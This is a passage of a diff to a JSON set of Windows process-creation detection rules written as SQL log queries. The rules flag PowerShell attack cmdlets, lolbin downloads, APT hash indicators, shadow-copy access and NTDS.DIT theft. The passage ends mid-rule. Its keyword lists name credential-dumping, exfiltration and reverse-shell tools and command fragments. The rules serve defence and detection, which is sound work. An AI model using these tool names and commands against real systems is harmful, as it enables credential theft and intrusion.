WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 
'%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE 
'\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine 
LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine 
LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR 
CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "MSHTA 
Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' 
OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 
'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", - "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": 
"Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1216" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ + "attack.privilege_escalation", "attack.credential_access", - "attack.t1003.003" + "attack.t1212" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' 
ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 